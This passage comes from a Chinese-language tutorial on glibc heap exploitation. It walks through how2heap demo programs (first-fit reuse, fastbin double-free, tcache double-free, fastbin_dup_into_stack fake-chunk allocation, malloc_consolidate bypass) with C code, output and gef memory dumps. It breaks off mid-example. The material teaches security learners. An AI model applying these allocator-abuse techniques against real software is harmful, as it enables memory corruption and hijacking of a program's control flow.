3.1.6 Linux 堆利用（一）

Linux 堆简介

堆是程序虚拟地址空间中的一块连续的区域，由低地址向高地址增长。当前 Linux 使用的堆分配器被称为 ptmalloc2，在 glibc 中实现。

更详细的我们已经在章节 1.5.8 中介绍了，章节 1.5.7 中也有相关内容，请回顾一下。

对堆利用来说，不用于栈上的溢出能够直接覆盖函数的返回地址从而控制 EIP，只能通过间接手段来劫持程序控制流。

how2heap

how2heap 是由 shellphish 团队制作的堆利用教程，介绍了多种堆利用技术，这篇文章我们就通过这个教程来学习。推荐使用 Ubuntu 16.04 64位系统环境，glibc 版本如下：

$ file /lib/x86_64-linux-gnu/libc-2.23.so
/lib/x86_64-linux-gnu/libc-2.23.so: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=088a6e00a1814622219f346b41e775b8dd46c518, for GNU/Linux 2.6.32, stripped

$ git clone https://github.com/shellphish/how2heap.git
$ cd how2heap
$ make

请注意，下文中贴出的代码是我简化过的，剔除和修改了一些不必要的注释和代码，以方便学习。另外，正如章节 4.3 中所讲的，添加编译参数 CFLAGS += -fsanitize=address 可以检测内存错误。下载文件

first_fit

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main() {
    char* a = malloc(512);
    char* b = malloc(256);
    char* c;

    fprintf(stderr, "1st malloc(512): %p\n", a);
    fprintf(stderr, "2nd malloc(256): %p\n", b);
    strcpy(a, "AAAAAAAA");
    strcpy(b, "BBBBBBBB");
    fprintf(stderr, "first allocation %p points to %s\n", a, a);

    fprintf(stderr, "Freeing the first one...\n");
    free(a);

    c = malloc(500);
    fprintf(stderr, "3rd malloc(500): %p\n", c);
    strcpy(c, "CCCCCCCC");
    fprintf(stderr, "3rd allocation %p points to %s\n", c, c);
    fprintf(stderr, "first allocation %p points to %s\n", a, a);
}

$ gcc -g first_fit.c
$ ./a.out
1st malloc(512): 0x1380010
2nd malloc(256): 0x1380220
first allocation 0x1380010 points to AAAAAAAA
Freeing the first one...
3rd malloc(500): 0x1380010
3rd allocation 0x1380010 points to CCCCCCCC
first allocation 0x1380010 points to CCCCCCCC

这第一个程序展示了 glibc 堆分配的策略，即 first-fit。在分配内存时，malloc 会先到 unsorted bin（或者fastbins）中查找适合的被 free 的 chunk，如果没有，就会把 unsorted bin 中的所有 chunk 分别放入到所属的 bins 中，然后再去这些 bins 里去找合适的 chunk。可以看到第三次 malloc 的地址和第一次相同，即 malloc 找到了第一次 free 掉的 chunk，并把它重新分配。

在 gdb 中调试，两个 malloc 之后（chunk 位于 malloc 返回地址减去 0x10 的位置）：

gef➤  x/5gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000211 <-- chunk a
0x602010:   0x4141414141414141  0x0000000000000000
0x602020:   0x0000000000000000
gef➤  x/5gx 0x602220-0x10
0x602210:   0x0000000000000000  0x0000000000000111 <-- chunk b
0x602220:   0x4242424242424242  0x0000000000000000
0x602230:   0x0000000000000000

第一个 free 之后，将其加入到 unsorted bin 中：

gef➤  x/5gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000211 <-- chunk a [be freed]
0x602010:   0x00007ffff7dd1b78  0x00007ffff7dd1b78      <-- fd pointer, bk pointer
0x602020:   0x0000000000000000
gef➤  x/5gx 0x602220-0x10
0x602210:   0x0000000000000210  0x0000000000000110 <-- chunk b
0x602220:   0x4242424242424242  0x0000000000000000
0x602230:   0x0000000000000000
gef➤  heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602000, bk=0x602000
 →   Chunk(addr=0x602010, size=0x210, flags=PREV_INUSE)
[+] Found 1 chunks in unsorted bin.

第三个 malloc 之后：

gef➤  x/5gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000211 <-- chunk c
0x602010:   0x4343434343434343  0x00007ffff7dd1d00
0x602020:   0x0000000000000000
gef➤  x/5gx 0x602220-0x10
0x602210:   0x0000000000000210  0x0000000000000111 <-- chunk b
0x602220:   0x4242424242424242  0x0000000000000000
0x602230:   0x0000000000000000

所以当释放一块内存后再申请一块大小略小于的空间，那么 glibc 倾向于将先前被释放的空间重新分配。

好了，现在我们加上内存检测参数重新编译：

$ gcc -fsanitize=address -g first_fit.c
$ ./a.out
1st malloc(512): 0x61500000fd00
2nd malloc(256): 0x611000009f00
first allocation 0x61500000fd00 points to AAAAAAAA
Freeing the first one...
3rd malloc(500): 0x61500000fa80
3rd allocation 0x61500000fa80 points to CCCCCCCC
=================================================================
==4525==ERROR: AddressSanitizer: heap-use-after-free on address 0x61500000fd00 at pc 0x7f49d14a61e9 bp 0x7ffe40b526e0 sp 0x7ffe40b51e58
READ of size 2 at 0x61500000fd00 thread T0
    #0 0x7f49d14a61e8  (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x601e8)
    #1 0x7f49d14a6bcc in vfprintf (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x60bcc)
    #2 0x7f49d14a6cf9 in fprintf (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x60cf9)
    #3 0x400b8b in main /home/firmy/how2heap/first_fit.c:23
    #4 0x7f49d109c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #5 0x400878 in _start (/home/firmy/how2heap/a.out+0x400878)

0x61500000fd00 is located 0 bytes inside of 512-byte region [0x61500000fd00,0x61500000ff00)
freed by thread T0 here:
    #0 0x7f49d14de2ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca)
    #1 0x400aa2 in main /home/firmy/how2heap/first_fit.c:17
    #2 0x7f49d109c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

previously allocated by thread T0 here:
    #0 0x7f49d14de602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x400957 in main /home/firmy/how2heap/first_fit.c:6
    #2 0x7f49d109c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

一个很明显的 use-after-free 漏洞。关于这类漏洞的详细利用过程，我们会在后面的章节里再讲。

fastbin_dup

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main() {
    fprintf(stderr, "Allocating 3 buffers.\n");
    char *a = malloc(9);
    char *b = malloc(9);
    char *c = malloc(9);
    strcpy(a, "AAAAAAAA");
    strcpy(b, "BBBBBBBB");
    strcpy(c, "CCCCCCCC");
    fprintf(stderr, "1st malloc(9) %p points to %s\n", a, a);
    fprintf(stderr, "2nd malloc(9) %p points to %s\n", b, b);
    fprintf(stderr, "3rd malloc(9) %p points to %s\n", c, c);

    fprintf(stderr, "Freeing the first one %p.\n", a);
    free(a);
    fprintf(stderr, "Then freeing another one %p.\n", b);
    free(b);
    fprintf(stderr, "Freeing the first one %p again.\n", a);
    free(a);

    fprintf(stderr, "Allocating 3 buffers.\n");
    char *d = malloc(9);
    char *e = malloc(9);
    char *f = malloc(9);
    strcpy(d, "DDDDDDDD");
    fprintf(stderr, "4st malloc(9) %p points to %s the first time\n", d, d);
    strcpy(e, "EEEEEEEE");
    fprintf(stderr, "5nd malloc(9) %p points to %s\n", e, e);
    strcpy(f, "FFFFFFFF");
    fprintf(stderr, "6rd malloc(9) %p points to %s the second time\n", f, f);
}

$ gcc -g fastbin_dup.c
$ ./a.out
Allocating 3 buffers.
1st malloc(9) 0x1c07010 points to AAAAAAAA
2nd malloc(9) 0x1c07030 points to BBBBBBBB
3rd malloc(9) 0x1c07050 points to CCCCCCCC
Freeing the first one 0x1c07010.
Then freeing another one 0x1c07030.
Freeing the first one 0x1c07010 again.
Allocating 3 buffers.
4st malloc(9) 0x1c07010 points to DDDDDDDD the first time
5nd malloc(9) 0x1c07030 points to EEEEEEEE
6rd malloc(9) 0x1c07010 points to FFFFFFFF the second time

这个程序展示了利用 fastbins 的 double-free 攻击，可以泄漏出一块已经被分配的内存指针。fastbins 可以看成一个 LIFO 的栈，使用单链表实现，通过 fastbin->fd 来遍历 fastbins。由于 free 的过程会对 free list 做检查，我们不能连续两次 free 同一个 chunk，所以这里在两次 free 之间，增加了一次对其他 chunk 的 free 过程，从而绕过检查顺利执行。然后再 malloc 三次，就在同一个地址 malloc 了两次，也就有了两个指向同一块内存区域的指针。

libc-2.23 中对 double-free 的检查过程如下：

    /* Check that the top of the bin is not the record we are going to add
       (i.e., double free).  */
    if (__builtin_expect (old == p, 0))
      {
        errstr = "double free or corruption (fasttop)";
        goto errout;
      }

它在检查 fast bin 的 double-free 时只是检查了第一个块。所以其实是存在缺陷的。

三个 malloc 之后：

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021 <-- chunk a
0x602010:   0x4141414141414141  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000021 <-- chunk b
0x602030:   0x4242424242424242  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000021 <-- chunk c
0x602050:   0x4343434343434343  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000020fa1 <-- top chunk
0x602070:   0x0000000000000000

第一个 free 之后，chunk a 被添加到 fastbins 中：

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021 <-- chunk a [be freed]
0x602010:   0x0000000000000000  0x0000000000000000      <-- fd pointer
0x602020:   0x0000000000000000  0x0000000000000021 <-- chunk b
0x602030:   0x4242424242424242  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000021 <-- chunk c
0x602050:   0x4343434343434343  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000020fa1
0x602070:   0x0000000000000000
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10]  ←  Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)

第二个 free 之后，chunk b 被添加到 fastbins 中：

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021 <-- chunk a [be freed]
0x602010:   0x0000000000000000  0x0000000000000000      <-- fd pointer
0x602020:   0x0000000000000000  0x0000000000000021 <-- chunk b [be freed]
0x602030:   0x0000000000602000  0x0000000000000000      <-- fd pointer
0x602040:   0x0000000000000000  0x0000000000000021 <-- chunk c
0x602050:   0x4343434343434343  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000020fa1
0x602070:   0x0000000000000000
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10]  ←  Chunk(addr=0x602030, size=0x20, flags=PREV_INUSE)  ←  Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)

此时由于 chunk a 处于 bin 中第 2 块的位置，不会被 double-free 的检查机制检查出来。所以第三个 free 之后，chunk a 再次被添加到 fastbins 中：

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021 <-- chunk a [be freed again]
0x602010:   0x0000000000602020  0x0000000000000000      <-- fd pointer
0x602020:   0x0000000000000000  0x0000000000000021 <-- chunk b [be freed]
0x602030:   0x0000000000602000  0x0000000000000000      <-- fd pointer
0x602040:   0x0000000000000000  0x0000000000000021 <-- chunk c
0x602050:   0x4343434343434343  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000020fa1
0x602070:   0x0000000000000000
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10]  ←  Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)  ←  Chunk(addr=0x602030, size=0x20, flags=PREV_INUSE)  ←  Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)  →  [loop detected]

此时 chunk a 和 chunk b 似乎形成了一个环。

再三个 malloc 之后：

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021 <-- chunk d, chunk f
0x602010:   0x4646464646464646  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000021 <-- chunk e
0x602030:   0x4545454545454545  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000021 <-- chunk c
0x602050:   0x4343434343434343  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000020fa1
0x602070:   0x0000000000000000

所以对于 fastbins，可以通过 double-free 泄漏出一个堆块的指针。

加上内存检测参数重新编译：

$ gcc -fsanitize=address -g fastbin_dup.c
$ ./a.out
Allocating 3 buffers.
1st malloc(9) 0x60200000eff0 points to AAAAAAAA
2nd malloc(9) 0x60200000efd0 points to BBBBBBBB
3rd malloc(9) 0x60200000efb0 points to CCCCCCCC
Freeing the first one 0x60200000eff0.
Then freeing another one 0x60200000efd0.
Freeing the first one 0x60200000eff0 again.
=================================================================
==5650==ERROR: AddressSanitizer: attempting double-free on 0x60200000eff0 in thread T0:
    #0 0x7fdc18ebf2ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca)
    #1 0x400ba3 in main /home/firmy/how2heap/fastbin_dup.c:22
    #2 0x7fdc18a7d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #3 0x400878 in _start (/home/firmy/how2heap/a.out+0x400878)

0x60200000eff0 is located 0 bytes inside of 9-byte region [0x60200000eff0,0x60200000eff9)
freed by thread T0 here:
    #0 0x7fdc18ebf2ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca)
    #1 0x400b0d in main /home/firmy/how2heap/fastbin_dup.c:18
    #2 0x7fdc18a7d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

previously allocated by thread T0 here:
    #0 0x7fdc18ebf602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x400997 in main /home/firmy/how2heap/fastbin_dup.c:7
    #2 0x7fdc18a7d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

一个很明显的 double-free 漏洞。关于这类漏洞的详细利用过程，我们会在后面的章节里再讲。

看一点新鲜的，在 libc-2.26 中，即使两次 free，也并没有触发 double-free 的异常检测，这与 tcache 机制有关，以后会详细讲述。这里先看个能够在该版本下触发 double-free 的例子：

#include <stdio.h>
#include <stdlib.h>

int main() {
    int i;

    void *p = malloc(0x40);
    fprintf(stderr, "First allocate a fastbin: p=%p\n", p);

    fprintf(stderr, "Then free(p) 7 times\n");
    for (i = 0; i < 7; i++) {
        fprintf(stderr, "free %d: %p => %p\n", i+1, &p, p);
        free(p);
    }

    fprintf(stderr, "Then malloc 8 times at the same address\n");
    int *a[10];
    for (i = 0; i < 8; i++) {
        a[i] = malloc(0x40);
        fprintf(stderr, "malloc %d: %p => %p\n", i+1, &a[i], a[i]);
    }

    fprintf(stderr, "Finally trigger double-free\n");
    for (i = 0; i < 2; i++) {
        fprintf(stderr, "free %d: %p => %p\n", i+1, &a[i], a[i]);
        free(a[i]);
    }
}

$ gcc -g tcache_double-free.c
$ ./a.out
First allocate a fastbin: p=0x559e30950260
Then free(p) 7 times
free 1: 0x7ffc498b2958 => 0x559e30950260
free 2: 0x7ffc498b2958 => 0x559e30950260
free 3: 0x7ffc498b2958 => 0x559e30950260
free 4: 0x7ffc498b2958 => 0x559e30950260
free 5: 0x7ffc498b2958 => 0x559e30950260
free 6: 0x7ffc498b2958 => 0x559e30950260
free 7: 0x7ffc498b2958 => 0x559e30950260
Then malloc 8 times at the same address
malloc 1: 0x7ffc498b2960 => 0x559e30950260
malloc 2: 0x7ffc498b2968 => 0x559e30950260
malloc 3: 0x7ffc498b2970 => 0x559e30950260
malloc 4: 0x7ffc498b2978 => 0x559e30950260
malloc 5: 0x7ffc498b2980 => 0x559e30950260
malloc 6: 0x7ffc498b2988 => 0x559e30950260
malloc 7: 0x7ffc498b2990 => 0x559e30950260
malloc 8: 0x7ffc498b2998 => 0x559e30950260
Finally trigger double-free
free 1: 0x7ffc498b2960 => 0x559e30950260
free 2: 0x7ffc498b2968 => 0x559e30950260
double free or corruption (fasttop)
[2]    1244 abort (core dumped)  ./a.out

fastbin_dup_into_stack

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main() {
    unsigned long long stack_var = 0x21;
    fprintf(stderr, "Allocating 3 buffers.\n");
    char *a = malloc(9);
    char *b = malloc(9);
    char *c = malloc(9);
    strcpy(a, "AAAAAAAA");
    strcpy(b, "BBBBBBBB");
    strcpy(c, "CCCCCCCC");
    fprintf(stderr, "1st malloc(9) %p points to %s\n", a, a);
    fprintf(stderr, "2nd malloc(9) %p points to %s\n", b, b);
    fprintf(stderr, "3rd malloc(9) %p points to %s\n", c, c);

    fprintf(stderr, "Freeing the first one %p.\n", a);
    free(a);
    fprintf(stderr, "Then freeing another one %p.\n", b);
    free(b);
    fprintf(stderr, "Freeing the first one %p again.\n", a);
    free(a);

    fprintf(stderr, "Allocating 4 buffers.\n");
    unsigned long long *d = malloc(9);
    *d = (unsigned long long) (((char*)&stack_var) - sizeof(d));
    fprintf(stderr, "4nd malloc(9) %p points to %p\n", d, &d);
    char *e = malloc(9);
    strcpy(e, "EEEEEEEE");
    fprintf(stderr, "5nd malloc(9) %p points to %s\n", e, e);
    char *f = malloc(9);
    strcpy(f, "FFFFFFFF");
    fprintf(stderr, "6rd malloc(9) %p points to %s\n", f, f);
    char *g = malloc(9);
    strcpy(g, "GGGGGGGG");
    fprintf(stderr, "7th malloc(9) %p points to %s\n", g, g);
}

$ gcc -g fastbin_dup_into_stack.c
$ ./a.out
Allocating 3 buffers.
1st malloc(9) 0xcf2010 points to AAAAAAAA
2nd malloc(9) 0xcf2030 points to BBBBBBBB
3rd malloc(9) 0xcf2050 points to CCCCCCCC
Freeing the first one 0xcf2010.
Then freeing another one 0xcf2030.
Freeing the first one 0xcf2010 again.
Allocating 4 buffers.
4nd malloc(9) 0xcf2010 points to 0x7ffd1e0d48b0
5nd malloc(9) 0xcf2030 points to EEEEEEEE
6rd malloc(9) 0xcf2010 points to FFFFFFFF
7th malloc(9) 0x7ffd1e0d48b0 points to GGGGGGGG

这个程序展示了怎样通过修改 fd 指针，将其指向一个伪造的 free chunk，在伪造的地址处 malloc 出一个 chunk。该程序大部分内容都和上一个程序一样，漏洞也同样是 double-free，只有给 fd 填充的内容不一样。

三个 malloc 之后：

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021 <-- chunk a
0x602010:   0x4141414141414141  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000021 <-- chunk b
0x602030:   0x4242424242424242  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000021 <-- chunk c
0x602050:   0x4343434343434343  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000020fa1 <-- top chunk
0x602070:   0x0000000000000000

三个 free 之后：

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021 <-- chunk a [be freed twice]
0x602010:   0x0000000000602020  0x0000000000000000      <-- fd pointer
0x602020:   0x0000000000000000  0x0000000000000021 <-- chunk b [be freed]
0x602030:   0x0000000000602000  0x0000000000000000      <-- fd pointer
0x602040:   0x0000000000000000  0x0000000000000021 <-- chunk c
0x602050:   0x4343434343434343  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000020fa1
0x602070:   0x0000000000000000
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10]  ←  Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)  ←  Chunk(addr=0x602030, size=0x20, flags=PREV_INUSE)  ←  Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)  →  [loop detected]

这一次 malloc 之后，我们不再填充无意义的 "DDDDDDDD"，而是填充一个地址，即栈地址减去 0x8，从而在栈上伪造出一个 free 的 chunk（当然也可以是其他的地址）。这也是为什么 stack_var 被我们设置为 0x21（或0x20都可以），其实是为了在栈地址减去 0x8 的时候作为 fake chunk 的 size 字段。

glibc 在执行分配操作时，若块的大小符合 fast bin，则会在对应的 bin 中寻找合适的块，此时 glibc 将根据候选块的 size 字段计算出 fastbin 索引，然后与对应 bin 在 fastbin 中的索引进行比较，如果二者不匹配，则说明块的 size 字段遭到破坏。所以需要 fake chunk 的 size 字段被设置为正确的值。

/* offset 2 to use otherwise unindexable first 2 bins */
#define fastbin_index(sz) \
  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)

  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
    {
      idx = fastbin_index (nb);
      [...]

      if (victim != 0)
        {
          if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0))
            {
              errstr = "malloc(): memory corruption (fast)";
              [...]
            }
            [...]
        }
    }

简单地说就是 fake chunk 的 size 与 double-free 的 chunk 的 size 相同即可。

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021 <-- chunk d
0x602010:   0x00007fffffffdc30  0x0000000000000000      <-- fd pointer
0x602020:   0x0000000000000000  0x0000000000000021 <-- chunk b [be freed]
0x602030:   0x0000000000602000  0x0000000000000000      <-- fd pointer
0x602040:   0x0000000000000000  0x0000000000000021 <-- chunk c
0x602050:   0x4343434343434343  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000020fa1
0x602070:   0x0000000000000000
gef➤  p &stack_var
$4 = (unsigned long long *) 0x7fffffffdc38
gef➤  x/5gx 0x7fffffffdc38-0x8
0x7fffffffdc30: 0x0000000000000000  0x0000000000000021 <-- fake chunk [seems to be freed]
0x7fffffffdc40: 0x0000000000602010  0x0000000000602010      <-- fd pointer
0x7fffffffdc50: 0x0000000000602030
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10]  ←  Chunk(addr=0x602030, size=0x20, flags=PREV_INUSE)  ←  Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)  ←  Chunk(addr=0x7fffffffdc40, size=0x20, flags=PREV_INUSE)  ←  Chunk(addr=0x602020, size=0x0, flags=) [incorrect fastbin_index]

可以看到，伪造的 chunk 已经由指针链接到 fastbins 上了。之后 malloc 两次，即可将伪造的 chunk 移动到链表头部：

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021
0x602010:   0x4646464646464646  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000021
0x602030:   0x4545454545454545  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000021
0x602050:   0x4343434343434343  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000020fa1
0x602070:   0x0000000000000000
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10]  ←  Chunk(addr=0x7fffffffdc40, size=0x20, flags=PREV_INUSE)  ←  Chunk(addr=0x602020, size=0x0, flags=) [incorrect fastbin_index]

再次 malloc，即可在 fake chunk 处分配内存：

gef➤  x/5gx 0x7fffffffdc38-0x8
0x7fffffffdc30: 0x0000000000000000  0x0000000000000021 <-- fake chunk
0x7fffffffdc40: 0x4747474747474747  0x0000000000602000
0x7fffffffdc50: 0x0000000000602030

所以对于 fastbins，可以通过 double-free 覆盖 fastbins 的结构，来获得一个指向任意地址的指针。

fastbin_dup_consolidate

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

int main() {
    void *p1 = malloc(0x10);
    void *p2 = malloc(0x10);
    strcpy(p1, "AAAAAAAA");
    strcpy(p2, "BBBBBBBB");
    fprintf(stderr, "Allocated two fastbins: p1=%p p2=%p\n", p1, p2);

    fprintf(stderr, "Now free p1!\n");
    free(p1);

    void *p3 = malloc(0x400);
    fprintf(stderr, "Allocated large bin to trigger malloc_consolidate(): p3=%p\n", p3);
    fprintf(stderr, "In malloc_consolidate(), p1 is moved to the unsorted bin.\n");

    free(p1);
    fprintf(stderr, "Trigger the double free vulnerability!\n");
    fprintf(stderr, "We can pass the check in malloc() since p1 is not fast top.\n");

    void *p4 = malloc(0x10);
    strcpy(p4, "CCCCCCC");
    void *p5 = malloc(0x10);
    strcpy(p5, "DDDDDDDD");
    fprintf(stderr, "Now p1 is in unsorted bin and fast bin. So we'will get it twice: %p %p\n", p4, p5);
}

$ gcc -g fastbin_dup_consolidate.c
$ ./a.out
Allocated two fastbins: p1=0x17c4010 p2=0x17c4030
Now free p1!
Allocated large bin to trigger malloc_consolidate(): p3=0x17c4050
In malloc_consolidate(), p1 is moved to the unsorted bin.
Trigger the double free vulnerability!
We can pass the check in malloc() since p1 is not fast top.
Now p1 is in unsorted bin and fast bin. So we'will get it twice: 0x17c4010 0x17c4010

这个程序展示了利用在 large bin 的分配中 malloc_consolidate 机制绕过 fastbin 对 double free 的检查，这个检查在 fastbin_dup 中已经展示过了，只不过它利用的是在两次 free 中间插入一次对其它 chunk 的 free。

首先分配两个 fast chunk：

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021  <-- chunk p1
0x602010:   0x4141414141414141  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000021  <-- chunk p2
0x602030:   0x4242424242424242  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000020fc1  <-- top chunk
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000

释放掉 p1，则空闲 chunk 加入到 fastbins 中：

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021  <-- chunk p1 [be freed]
0x602010:   0x0000000000000000  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000021  <-- chunk p2
0x602030:   0x4242424242424242  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000020fc1  <-- top chunk
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10]  ←  Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)

此时如果我们再次释放 p1，必然触发 double free 异常，然而，如果此时分配一个 large chunk，效果如下：

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021  <-- chunk p1 [be freed]
0x602010:   0x00007ffff7dd1b88  0x00007ffff7dd1b88      <-- fd, bk pointer
0x602020:   0x0000000000000020  0x0000000000000020  <-- chunk p2
0x602030:   0x4242424242424242  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000411  <-- chunk p3
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10] 0x00
gef➤  heap bins small
[ Small Bins for arena 'main_arena' ]
[+] small_bins[1]: fw=0x602000, bk=0x602000
 →   Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)
[+] Found 1 chunks in 1 small non-empty bins.

可以看到 fastbins 中的 chunk 已经不见了，反而出现在了 small bins 中，并且 chunk p2 的 prev_size 和 size 字段都被修改。

看一下 large chunk 的分配过程：

  /*
     If this is a large request, consolidate fastbins before continuing.
     While it might look excessive to kill all fastbins before
     even seeing if there is space available, this avoids
     fragmentation problems normally associated with fastbins.
     Also, in practice, programs tend to have runs of either small or
     large requests, but less often mixtures, so consolidation is not
     invoked all that often in most programs. And the programs that
     it is called frequently in otherwise tend to fragment.
   */

  else
    {
      idx = largebin_index (nb);
      if (have_fastchunks (av))
        malloc_consolidate (av);
    }

当分配 large chunk 时，首先根据 chunk 的大小获得对应的 large bin 的 index，接着判断当前分配区的 fast bins 中是否包含 chunk，如果有，调用 malloc_consolidate() 函数合并 fast bins 中的 chunk，并将这些空闲 chunk 加入 unsorted bin 中。因为这里分配的是一个 large chunk，所以 unsorted bin 中的 chunk 按照大小被放回 small bins 或 large bins 中。

由于此时 p1 已经不在 fastbins 的顶部，可以再次释放 p1：

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021  <-- chunk p1 [double freed]
0x602010:   0x0000000000000000  0x00007ffff7dd1b88
0x602020:   0x0000000000000020  0x0000000000000020  <-- chunk p2
0x602030:   0x4242424242424242  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000411  <-- chunk p3
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10]  ←  Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)
gef➤  heap bins small
[ Small Bins for arena 'main_arena' ]
[+] small_bins[1]: fw=0x602000, bk=0x602000
 →   Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)
[+] Found 1 chunks in 1 small non-empty bins.

p1 被再次放入 fastbins，于是 p1 同时存在于 fabins 和 small bins 中。

第一次 malloc，chunk 将从 fastbins 中取出：

gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021  <-- chunk p1 [be freed], chunk p4
0x602010:   0x0043434343434343  0x00007ffff7dd1b88
0x602020:   0x0000000000000020  0x0000000000000020  <-- chunk p2
0x602030:   0x4242424242424242  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000411  <-- chunk p3
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10] 0x00
gef➤  heap bins small
[ Small Bins for arena 'main_arena' ]
[+] small_bins[1]: fw=0x602000, bk=0x602000
 →   Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)
[+] Found 1 chunks in 1 small non-empty bins.

第二次 malloc，chunk 从 small bins 中取出：

